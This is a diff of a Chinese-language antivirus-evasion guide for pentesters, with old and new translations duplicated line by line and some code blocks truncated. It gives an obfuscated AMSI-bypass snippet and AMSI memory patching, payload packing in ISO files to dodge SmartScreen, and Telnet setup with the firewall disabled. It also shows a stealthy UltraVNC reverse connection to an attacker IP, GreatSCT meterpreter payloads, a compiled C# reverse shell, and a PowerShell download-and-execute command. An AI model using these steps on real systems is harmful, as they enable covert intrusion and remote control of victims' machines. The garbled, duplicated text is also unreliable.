只需要一行PowerShell代码就可以使AMSI对当前PowerShell进程无效。当然这行代码已经被AMSI本身标记因此需要进行一些修改才能使用这种技术。
只需一行 PowerShell 代码就可以使当前 PowerShell 进程无法使用 AMSI。 这行代码当然已经被 AMSI 本身标记,因此需要进行一些修改才能使用此技术。
这是我从这个[Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db)中获取的修改后的AMSI绕过方法
这是我从这个 [Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db) 中获取的修改版 AMSI 绕过
```powershell
Try{#Ams1 bypass technic nº 2
$Xdatabase = 'Utils';$Homedrive = 'si'
@ -212,53 +214,57 @@ $Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
$Spotfix.SetValue($null,$true)
}Catch{Throw $_}
```
**内存篡改**
请记住,这篇文章发布后可能会被标记,因此如果你的计划是保持隐蔽,就不应该发布任何代码。
这种技术最初是由[@RastaMouse](https://twitter.com/\_RastaMouse/)发现的它涉及查找amsi.dll中“AmsiScanBuffer”函数的地址负责扫描用户提供的输入并用指令覆盖它以返回E\_INVALIDARG代码这样实际扫描的结果将返回0被解释为干净的结果。
**内存补丁**
该技术最初由 [@RastaMouse](https://twitter.com/\_RastaMouse/) 发现,涉及在 amsi.dll 中找到 "AmsiScanBuffer" 函数的地址(负责扫描用户提供的输入),并用返回 E\_INVALIDARG 代码的指令覆盖它,这样,实际扫描的结果将返回 0这被解释为干净的结果。
{% hint style="info" %}
请阅读[https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/)以获取更详细的解释。
请阅读 [https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/) 以获取更详细的解释。
{% endhint %}
还有许多其他用于绕过PowerShell的AMSI的技术请查看[**此页面**](basic-powershell-for-pentesters/#amsi-bypass)和[此存储库](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)以了解更多信息。
还有许多其他技术可以通过 PowerShell 绕过 AMSI查看 [**此页面**](basic-powershell-for-pentesters/#amsi-bypass) 和 [此仓库](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) 以了解更多信息。
或者这个脚本通过内存补丁将补丁应用于每个新的 PowerShell。
## 混淆
有几种工具可用于**混淆C#明文代码**,生成**元编程模板**以编译二进制文件或**混淆已编译的二进制文件**,例如:
有几种工具可以用来 **混淆 C# 明文代码**,生成 **元编程模板** 以编译二进制文件或 **混淆已编译的二进制文件**,例如:
* [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**C#混淆器**
* [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator):该项目的目标是提供[LLVM](http://www.llvm.org/)编译套件的开源分支,能够通过[代码混淆](http://en.wikipedia.org/wiki/Obfuscation\_\(software\))和防篡改提供增强软件安全性。
* [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator)ADVobfuscator演示了如何使用`C++11/14`语言在编译时生成混淆代码,而不使用任何外部工具或修改编译器。
* [**obfy**](https://github.com/fritzone/obfy)通过C++模板元编程框架生成一层混淆操作,使想要破解应用程序的人的生活变得更加困难
* [**Alcatraz**](https://github.com/weak1337/Alcatraz)**Alcatraz是一个能够混淆各种不同pe文件的x64二进制混淆器包括.exe、.dll、.sys
* [**metame**](https://github.com/a0rtega/metame)Metame是一个用于任意可执行文件的简单变形代码引擎
* [**ropfuscator**](https://github.com/ropfuscator/ropfuscator)ROPfuscator是一个针对LLVM支持的语言的细粒度代码混淆框架使用ROP返回导向编程在汇编代码级别混淆程序将常规指令转换为ROP链破坏我们对正常控制流的自然概念。
* [**Nimcrypt**](https://github.com/icyguider/nimcrypt)Nimcrypt是一个用Nim编写的.NET PE加密器。
* [**inceptor**](https://github.com/klezVirus/inceptor)**Inceptor能够将现有的EXE/DLL转换为shellcode然后加载它们。
* [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**: C# 混淆器**
* [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): 该项目的目的是提供一个开源的 LLVM 编译套件分支,能够通过 [代码混淆](http://en.wikipedia.org/wiki/Obfuscation\_\(software\)) 和防篡改提供增强软件安全性。
* [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator): ADVobfuscator 演示如何使用 `C++11/14` 语言在编译时生成混淆代码,而无需使用任何外部工具且不修改编译器。
* [**obfy**](https://github.com/fritzone/obfy): 添加一层由 C++ 模板元编程框架生成的混淆操作,这将使想要破解应用程序的人稍微困难一些
* [**Alcatraz**](https://github.com/weak1337/Alcatraz)**:** Alcatraz 是一个 x64 二进制混淆器,能够混淆各种不同的 pe 文件,包括:.exe, .dll, .sys
* [**metame**](https://github.com/a0rtega/metame): Metame 是一个简单的变形代码引擎,适用于任意可执行文件
* [**ropfuscator**](https://github.com/ropfuscator/ropfuscator): ROPfuscator 是一个细粒度的代码混淆框架,适用于使用 ROP面向返回的编程的 LLVM 支持语言。ROPfuscator 通过将常规指令转换为 ROP 链,在汇编代码级别混淆程序,阻碍我们对正常控制流的自然概念。
* [**Nimcrypt**](https://github.com/icyguider/nimcrypt): Nimcrypt 是一个用 Nim 编写的 .NET PE 加密器。
* [**inceptor**](https://github.com/klezVirus/inceptor)**:** Inceptor 能够将现有的 EXE/DLL 转换为 shellcode然后加载它们。
## SmartScreen和MoTW
## SmartScreen MoTW
当从互联网下载并执行一些可执行文件时,您可能会看到此屏幕。
你可能在从互联网下载某些可执行文件并执行它们时见过这个屏幕。
Microsoft Defender SmartScreen是一种旨在保护最终用户免受运行潜在恶意应用程序的安全机制
Microsoft Defender SmartScreen 是一种安全机制,旨在保护最终用户免受运行潜在恶意应用程序的影响
<figure><img src="../.gitbook/assets/image (664).png" alt=""><figcaption></figcaption></figure>
SmartScreen主要采用基于声誉的方法意味着不常见的下载应用程序将触发SmartScreen从而警告并阻止最终用户执行文件(尽管仍可以通过单击更多信息 -> 仍然运行来执行文件)。
SmartScreen 主要采用基于声誉的方法,意味着不常下载应用程序将触发 SmartScreen从而警告并阻止最终用户执行该文件(尽管可以通过点击更多信息 -> 无论如何运行来执行该文件)。
**MoTW**Mark of The Web是一个带有Zone.Identifier名称的[NTFS备用数据流](https://en.wikipedia.org/wiki/NTFS#Alternate\_data\_stream\_\(ADS\)),在从互联网下载文件时会自动创建,以及它被下载的URL。
**MoTW**网络标记)是一个 [NTFS 备用数据流](https://en.wikipedia.org/wiki/NTFS#Alternate\_data\_stream\_\(ADS\)),其名称为 Zone.Identifier下载来自互联网的文件时会自动创建并附带下载的 URL。
<figure><img src="../.gitbook/assets/image (237).png" alt=""><figcaption><p>检查从互联网下载的文件的Zone.Identifier ADS。</p></figcaption></figure>
<figure><img src="../.gitbook/assets/image (237).png" alt=""><figcaption><p>检查从互联网下载的文件的 Zone.Identifier ADS。</p></figcaption></figure>
{% hint style="info" %}
重要提示:使用**受信任的**签名证书签名的可执行文件**不会触发SmartScreen**
重要的是要注意,使用 **受信任** 签名证书签名的可执行文件 **不会触发 SmartScreen**
{% endhint %}
防止您的有效载荷获得Mark of The Web的一种非常有效的方法是将它们打包到某种容器中比如ISO。这是因为Mark-of-the-WebMOTW**无法**应用于**非NTFS**卷。
防止你的有效载荷获得网络标记的一个非常有效的方法是将它们打包在某种容器中,例如 ISO。这是因为网络标记MOTW **不能** 应用于 **非 NTFS** 卷。
<figure><img src="../.gitbook/assets/image (640).png" alt=""><figcaption></figcaption></figure>
[**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/)是一个将有效载荷打包到输出容器中以规避Mark-of-the-Web的工具
[**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/) 是一个将有效载荷打包到输出容器中的工具,以规避网络标记
示例用法:
```powershell
@ -282,103 +288,105 @@ Adding file: /TotallyLegitApp.exe
[+] Generated file written to (size: 3420160): container.iso
```
以下是使用[PackMyPayload](https://github.com/mgeeky/PackMyPayload/)将有效负载打包在ISO文件中绕过SmartScreen的演示
这里是一个演示,通过使用 [PackMyPayload](https://github.com/mgeeky/PackMyPayload/) 将有效载荷打包在 ISO 文件中来绕过 SmartScreen
<figure><img src="../.gitbook/assets/packmypayload_demo.gif" alt=""><figcaption></figcaption></figure>
## C#程序集反射
## C# 程序集反射
将C#二进制文件加载到内存中已经有一段时间了,这仍然是一个非常好的方法,可以在不被杀毒软件发现的情况下运行您的后渗透工具
在内存中加载 C# 二进制文件已经被知道了一段时间,这仍然是运行后渗透工具而不被 AV 捕获的非常好方法
由于有效负载将直接加载到内存中而不会触及磁盘我们只需要担心为整个过程打补丁AMS。大多数C2框架如sliver、Covenant、metasploit、CobaltStrike、Havoc等已经提供了直接在内存中执行C#程序集的能力,但有不同的执行方式:
由于有效载荷将直接加载到内存中而不接触磁盘,我们只需担心在整个过程中修补 AMSI。
* **分叉和运行**
大多数 C2 框架sliver、Covenant、metasploit、CobaltStrike、Havoc 等)已经提供了直接在内存中执行 C# 程序集的能力,但有不同的方法来做到这一点:
它涉及**生成一个新的牺牲进程**将您的后渗透恶意代码注入到该新进程中执行您的恶意代码完成后终止新进程。这种方法的好处和缺点都有。分叉和运行方法的好处在于执行发生在我们的Beacon植入进程**之外**。这意味着如果我们的后渗透操作出了问题或被发现,我们的**植入物存活的机会**要**大得多**。缺点是您有**更大的机会**被**行为检测**发现。
* **Fork\&Run**
这涉及到 **生成一个新的牺牲进程**将你的后渗透恶意代码注入到那个新进程中执行你的恶意代码完成后杀死新进程。这有其优点和缺点。Fork 和 run 方法的好处在于执行发生在我们的 Beacon 植入进程 **之外**。这意味着如果我们的后渗透操作出现问题或被捕获,我们的 **植入物存活的机会更大**。缺点是你被 **行为检测** 捕获的 **机会更大**
<figure><img src="../.gitbook/assets/image (215).png" alt=""><figcaption></figcaption></figure>
* **内联**
* **Inline**
这是将后渗透恶意代码**注入到自己的进程**中。这样您可以避免创建新进程并使其被杀毒软件扫描但缺点是如果有效负载执行出现问题您的Beacon**很可能会丢失**,因为它可能会崩溃。
这是将后渗透恶意代码 **注入到其自身进程中**。这样,你可以避免创建新进程并让其被 AV 扫描,但缺点是如果你的有效载荷执行出现问题,**失去你的 beacon 的机会更大**,因为它可能崩溃。
<figure><img src="../.gitbook/assets/image (1136).png" alt=""><figcaption></figcaption></figure>
{% hint style="info" %}
如果您想了解更多关于C#程序集加载的信息,请查看这篇文章[https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/)以及他们的InlineExecute-Assembly BOF ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))
如果你想了解更多关于 C# 程序集加载的信息,请查看这篇文章 [https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/) 和他们的 InlineExecute-Assembly BOF ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))
{% endhint %}
您还可以**从PowerShell**加载C#程序集,请查看[Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader)和[S3cur3th1sSh1t的视频](https://www.youtube.com/watch?v=oe11Q-3Akuk)。
你还可以 **从 PowerShell 加载 C# 程序集**,查看 [Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader) [S3cur3th1sSh1t 的视频](https://www.youtube.com/watch?v=oe11Q-3Akuk)。
## 使用其他编程语言
如[**https://github.com/deeexcee-io/LOI-Bins**](https://github.com/deeexcee-io/LOI-Bins)中提出的,通过让受损机器访问**攻击者控制的SMB共享上安装的解释器环境**,可以使用其他语言执行恶意代码。
正如在 [**https://github.com/deeexcee-io/LOI-Bins**](https://github.com/deeexcee-io/LOI-Bins) 中提出的,可以通过让被攻陷的机器访问 **攻击者控制的 SMB 共享上的解释器环境**使用其他语言执行恶意代码。
通过允许访问解释器二进制文件和SMB共享上的环境您可以在受损机器的内存中**执行这些语言中的任意代码**
通过允许访问 SMB 共享上的解释器二进制文件和环境,你可以 **在被攻陷机器的内存中执行这些语言的任意代码**
存储库指出Defender仍然会扫描脚本但通过利用Go、Java、PHP等我们有**更多灵活性来绕过静态签名**。在这些语言中使用随机未混淆的反向外壳脚本进行测试已被证明是成功的
仓库指出Defender 仍然会扫描脚本,但通过利用 Go、Java、PHP 等,我们有 **更多的灵活性来绕过静态签名**。使用这些语言中的随机未混淆反向 shell 脚本进行测试已证明成功
## 高级
## 高级
逃避是一个非常复杂的主题,有时您必须考虑一个系统中许多不同来源的遥测数据,因此在成熟的环境中完全不被检测到几乎是不可能的。
规避是一个非常复杂的话题,有时你必须考虑一个系统中许多不同的遥测来源,因此在成熟环境中完全不被检测几乎是不可能的。
您对抗的每个环境都有其优势和劣势
你所面对的每个环境都有其自身的优缺点
我强烈建议您观看[@ATTL4S](https://twitter.com/DaniLJ94)的这个演讲,以了解更多关于高级逃避技术的入门
我强烈建议你观看 [@ATTL4S](https://twitter.com/DaniLJ94) 的这场演讲,以了解更多高级规避技术
{% embed url="https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo" %}
这也是[@mariuszbit](https://twitter.com/mariuszbit)关于深度逃避的另一个很棒的演讲。
这也是 [@mariuszbit](https://twitter.com/mariuszbit) 关于深度规避的另一场精彩演讲。
{% embed url="https://www.youtube.com/watch?v=IbA7Ung39o4" %}
## **旧技术**
### **检查Defender发现的恶意部分**
### **检查 Defender 发现的恶意部分**
您可以使用[**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck),它会**删除二进制文件的部分**直到找出Defender认为是恶意的部分并将其拆分给您。\
另一个执行**相同操作的工具是**[**avred**](https://github.com/dobin/avred),提供在[**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)上的开放网络服务。
你可以使用 [**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck),它将 **移除二进制文件的部分**,直到 **找出 Defender** 发现的恶意部分并将其分离给你。\
另一个**同样事情的工具是** [**avred**](https://github.com/dobin/avred),它提供了一个开放的网络服务,地址为 [**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)
### **Telnet服务器**
### **Telnet 服务器**
直到Windows10所有Windows都带有一个**Telnet服务器**,您可以安装它(作为管理员)执行
直到 Windows 10所有 Windows 都附带一个 **Telnet 服务器**,你可以通过以下方式安装(作为管理员)
```bash
pkgmgr /iu:"TelnetServer" /quiet
```
让它在系统启动时**启动**并立即**运行**
使其在系统启动时**启动**并**立即运行**
```bash
sc config TlntSVR start= auto obj= localsystem
```
**更改 telnet 端口**(隐蔽)并禁用防火墙:
**更改telnet端口** (隐蔽) 并禁用防火墙:
```
tlntadmn config port=80
netsh advfirewall set allprofiles state off
```
### UltraVNC
以下链接下载:[http://www.uvnc.com/downloads/ultravnc.html](http://www.uvnc.com/downloads/ultravnc.html)(你需要下载二进制文件,而不是安装程序)
这里下载: [http://www.uvnc.com/downloads/ultravnc.html](http://www.uvnc.com/downloads/ultravnc.html)(你需要的是二进制下载,而不是安装程序)
**在主机上**:执行 _**winvnc.exe**_ 并配置服务器:
**在主机上**: 执行 _**winvnc.exe**_ 并配置服务器:
* 启用选项 _Disable TrayIcon_
* 在 _VNC Password_ 中设置密码
* 在 _View-Only Password_ 中设置密码
然后,将二进制文件 _**winvnc.exe**_**新创建的**文件 _**UltraVNC.ini**_ 移动到**受害者**内
然后,将二进制文件 _**winvnc.exe**_ **新创建的** 文件 _**UltraVNC.ini**_ 移动到 **受害者** 机器中
#### **反向连接**
**攻击者**应该在他的**主机**内执行二进制文件 `vncviewer.exe -listen 5900`,这样它就会**准备好**接收反向**VNC连接**。然后,在**受害者**内:启动 winvnc 守护程序 `winvnc.exe -run` 并运行 `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900`
**攻击者**应在其 **主机** 中执行二进制文件 `vncviewer.exe -listen 5900`,以便 **准备** 捕获反向 **VNC 连接**。然后,在 **受害者** 机器中: 启动 winvnc 守护进程 `winvnc.exe -run` 并运行 `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900`
**警告**为了保持隐蔽,你必须避免做一些事情
**警告:** 为了保持隐蔽性,你必须避免以下几件事
* 如果 `winvnc` 已经在运行,不要启动它,否则会触发[弹出窗口](https://i.imgur.com/1SROTTl.png)。使用 `tasklist | findstr winvnc` 检查是否在运行
* 不要在没有 `UltraVNC.ini` 的同一目录中启动 `winvnc`,否则会导致[配置窗口](https://i.imgur.com/rfMQWcf.png)打开
* 不要运行 `winvnc -h` 获取帮助,否则会触发[弹出窗口](https://i.imgur.com/oc18wcu.png)
* 如果 `winvnc` 已经在运行,不要再次启动它,否则会触发一个 [弹出窗口](https://i.imgur.com/1SROTTl.png)。使用 `tasklist | findstr winvnc` 检查是否在运行
* 如果没有 `UltraVNC.ini` 在同一目录中,不要启动 `winvnc`,否则会导致 [配置窗口](https://i.imgur.com/rfMQWcf.png) 打开
* 不要运行 `winvnc -h` 获取帮助,否则会触发一个 [弹出窗口](https://i.imgur.com/oc18wcu.png)
### GreatSCT
以下链接下载:[https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
这里下载: [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
```
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/setup/
@ -386,7 +394,7 @@ cd GreatSCT/setup/
cd ..
./GreatSCT.py
```
在GreatSCT内部
GreatSCT 内部:
```
use 1
list #Listing available payloads
@ -396,23 +404,23 @@ sel lport 4444
generate #payload is the default name
#This will generate a meterpreter xml and a rcc file for msfconsole
```
现在使用 `msfconsole -r file.rc` 启动**监听器**,然后执行以下**xml payload**
现在 **启动监听器** 使用 `msfconsole -r file.rc`**执行** **xml 负载** 使用
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
```
**当前的防御程序会非常快速地终止该进程。**
**当前的防御者会非常快速地终止进程。**
### 编译我们自己的反向 shell
https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
https://medium.com/@Bank\_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
#### 第一个 C# 反向 shell
使用以下命令进行编译:
使用以下命令编译:
```
c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt
```
使用方法
使用它与
```
back.exe <ATTACKER_IP> <PORT>
```
@ -489,14 +497,10 @@ catch (Exception err) { }
}
}
```
### 使用编译器的C#
### C# 使用编译器
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt
```
[REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066](https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066)
[REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639](https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639)
自动下载和执行:
```csharp
64bit:
@ -507,7 +511,7 @@ powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.g
```
{% embed url="https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f" %}
C#混淆器列表: [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator)
C# 混淆器列表: [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator)
### C++
```
@ -522,7 +526,7 @@ i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sec
* [http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html](http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html)
* [http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/](http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/)
### 使用Python构建注入器示例
### 使用 Python 构建注入器示例:
* [https://github.com/cocomelonc/peekaboo](https://github.com/cocomelonc/peekaboo)
@ -555,16 +559,17 @@ https://github.com/praetorian-code/vulcan
* [https://github.com/persianhydra/Xeexe-TopAntivirusEvasion](https://github.com/persianhydra/Xeexe-TopAntivirusEvasion)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

Some files were not shown because too many files have changed in this diff Show more